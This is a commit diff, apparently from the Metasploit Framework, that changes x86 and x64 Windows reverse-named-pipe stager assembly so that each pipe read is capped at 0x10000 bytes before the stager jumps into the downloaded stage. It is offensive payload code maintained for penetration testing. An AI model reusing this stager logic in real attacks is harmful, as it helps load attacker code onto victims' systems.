Force max 0x10000 bytes when reading from pipe in stager

OJ · Brent Cook · commit c8b8ef03bd5f · 2017-09-07T01:36:23.000-05:00
diff --git a/lib/msf/core/payload/windows/reverse_named_pipe.rb b/lib/msf/core/payload/windows/reverse_named_pipe.rb
@@ -208,21 +208,14 @@ def asm_reverse_named_pipe(opts={})
         push ebx                ; push the address of the new stage so we can return into it
 
       read_more:
-        ; Query/read the bytes that are on the pipe first using PeekNamedPipe
-        push eax                ; space for the number of bytes
-        mov eax, esp            ; store the pointer
-        push 0                  ; lpBytesLeftThisMessage
-        push eax                ; lpTotalBytesAvail
-        push 0                  ; lpBytesRead
-        push esi                ; nBufferSize
-        push ebx                ; lpBuffer
-        push edi                ; hFile
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'PeekNamedPipe')}
-        call ebp                ; PeekNamedPipe(...) to query
-        pop ecx                 ; Get the bytes read/available
-        push ecx                ; leave the result on the stack
-
-        ; Invoke a read to flush the read data
+        ; prepare the size min(0x10000, esi)
+        mov ecx, 0x10000         ; stupid named pipe buffer limit
+        cmp ecx, esi
+        jle size_is_good
+        mov ecx, esi
+
+      size_is_good:
+        ; Invoke a read
         push eax                ; space for the number of bytes
         mov eax, esp            ; store the pointer
         push 0                  ; lpOverlapped
@@ -232,7 +225,6 @@ def asm_reverse_named_pipe(opts={})
         push edi                ; hFile
         push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
         call ebp                ; ReadFile(...) to read the data
-        pop ecx                 ; Ignore the result from readfile
     ^
 
     if reliable
diff --git a/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb b/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb
@@ -212,10 +212,17 @@ def asm_reverse_named_pipe(opts={})
         mov r15, rax            ; save the address so we can jump into it later
 
       read_more:
+        ; prepare the size min(0x10000, esi)
+        mov r8, 0x10000         ; stupid named pipe buffer limit
+        cmp r8, rsi
+        jle size_is_good
+        mov r8, rsi
+
+      size_is_good:
+        ; Invoke a read
         push 0                  ; buffer for lpNumberOfBytesRead
         mov r9, rsp             ; lpNumberOfBytesRead
         mov rdx, rbx            ; lpBuffer
-        mov r8, rsi             ; nNumberOfBytesToRead
         push 0                  ; lpOverlapped
         mov rcx, rdi            ; hFile
         mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
